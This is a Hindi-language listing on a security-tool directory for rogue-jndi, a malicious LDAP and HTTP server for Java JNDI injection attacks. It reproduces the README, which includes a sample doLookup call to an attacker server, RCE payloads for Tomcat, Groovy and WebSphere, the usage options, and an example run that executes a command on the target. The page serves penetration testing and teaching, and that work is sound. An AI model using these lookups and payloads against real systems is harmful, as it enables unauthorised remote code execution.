Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
rogue-jndi — JNDI इंजेक्शन हमलों के लिए एक दुर्भावनापूर्ण LDAP सर्वर | Kitploit
उपकरण/GitHubGitHub/veracode-research/rogue-jndi
शोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubveracode-research/rogue-jndi

rogue-jndi

JNDI इंजेक्शन हमलों के लिए एक दुर्भावनापूर्ण LDAP सर्वर

रिपॉजिटरी देखें
1.1k2272 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Rogue JNDI

JNDI इंजेक्शन हमलों के लिए एक दुर्भावनापूर्ण LDAP सर्वर।

विवरण

इस प्रोजेक्ट में डिफ़ॉल्ट रूप से असुरक्षित Java JNDI API का शोषण करने के लिए LDAP और HTTP सर्वर शामिल हैं।
हमला करने के लिए, आप इन सर्वरों को स्थानीय रूप से शुरू कर सकते हैं और फिर कमजोर क्लाइंट पर JNDI रिज़ॉल्यूशन ट्रिगर कर सकते हैं, उदाहरण के लिए:

root@kitploit:~
InitialContext.doLookup("ldap://your_server.com:1389/o=reference");

यह कमजोर क्लाइंट से स्थानीय LDAP सर्वर के लिए एक कनेक्शन शुरू करेगा। फिर, स्थानीय सर्वर एक दुर्भावनापूर्ण एंट्री के साथ प्रतिक्रिया करता है जिसमें एक पेलोड होता है, जो Remote Code Execution प्राप्त करने के लिए उपयोगी हो सकता है।

प्रेरणा

ज्ञात JNDI हमले विधियों (संदर्भों में रिमोट क्लासलोडिंग के माध्यम से) के अलावा, यह टूल ObjectFactories की शक्ति का लाभ उठाकर नए हमले वेक्टर लाता है।

समर्थित पेलोड

  • RemoteReference.java - क्लासिक JNDI हमला, रिमोट क्लासलोडिंग के माध्यम से RCE की ओर ले जाता है, jdk8u191 तक काम करता है
  • Tomcat.java - org.apache.naming.factory.BeanFactory में असुरक्षित रिफ्लेक्शन के माध्यम से RCE की ओर ले जाता है
  • Groovy.java - org.apache.naming.factory.BeanFactory + groovy.lang.GroovyShell में असुरक्षित रिफ्लेक्शन के माध्यम से RCE की ओर ले जाता है
  • WebSphere1.java - com.ibm.ws.webservices.engine.client.ServiceFactory में OOB XXE की ओर ले जाता है
  • WebSphere2.java - com.ibm.ws.client.applicationclient.ClientJ2CCFFactory में क्लासपाथ हेरफेर के माध्यम से RCE की ओर ले जाता है

उपयोग

root@kitploit:~
$ java -jar target/RogueJndi-1.0.jar -h
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Usage: java -jar target/RogueJndi-1.0.jar [options]
  Options:
    -c, --command  Command to execute on the target server (default: 
                   /Applications/Calculator.app/Contents/MacOS/Calculator) 
    -n, --hostname Local HTTP server hostname (required for remote 
                   classloading and websphere payloads) (default: 
                   192.168.1.10) 
    -l, --ldapPort Ldap bind port (default: 1389)
    -p, --httpPort Http bind port (default: 8000)
    --wsdl         [websphere1 payload option] WSDL file with XXE payload 
                   (default: /list.wsdl)
    --localjar     [websphere2 payload option] Local jar file to load (this 
                   file should be located on the remote server) (default: 
                   ../../../../../tmp/jar_cache7808167489549525095.tmp) 
    -h, --help     Show this help

सबसे महत्वपूर्ण पैरामीटर ldap सर्वर का होस्टनाम (-n, लक्ष्य से एक्सेस योग्य होना चाहिए) और वह कमांड है जिसे आप लक्ष्य सर्वर पर निष्पादित करना चाहते हैं (-c)।

"-c" विकल्प के विकल्प के रूप में, आप ExportObject.java फ़ाइल को संशोधित कर सकते हैं, उसमें वह java कोड डालकर जिसे आप लक्ष्य सर्वर पर निष्पादित करना चाहते हैं।

उदाहरण:

root@kitploit:~
$ java -jar target/RogueJndi-1.1.jar --command "nslookup your_dns_sever.com" --hostname "192.168.1.10"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2

निर्माण

Java v1.7+ और Maven v3+ आवश्यक हैं

root@kitploit:~
mvn package

अस्वीकरण

यह सॉफ्टवेयर केवल शैक्षिक उद्देश्यों और/या उन प्रणालियों के परीक्षण के लिए प्रदान किया गया है जिन पर हमला करने की उपयोगकर्ता को पूर्व अनुमति है।

विशेष धन्यवाद

  • Alvaro Muñoz और Oleksandr Mirosh JNDI हमलों पर उत्कृष्ट व्हाइटपेपर के लिए
  • @zerothoughts प्रेरणादायक spring-jndi रिपॉजिटरी के लिए
  • Moritz Bechler प्रख्यात marshallsec शोध के लिए
  • Orange Tsai और Welk1n Apache + Groovy गैजेट के लिए

लिंक

  • Veracode ब्लॉग में Exploiting JNDI Injections in Java के बारे में एक लेख
  • How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM

लेखक

Michael Stepankin

टूल डाउनलोड करें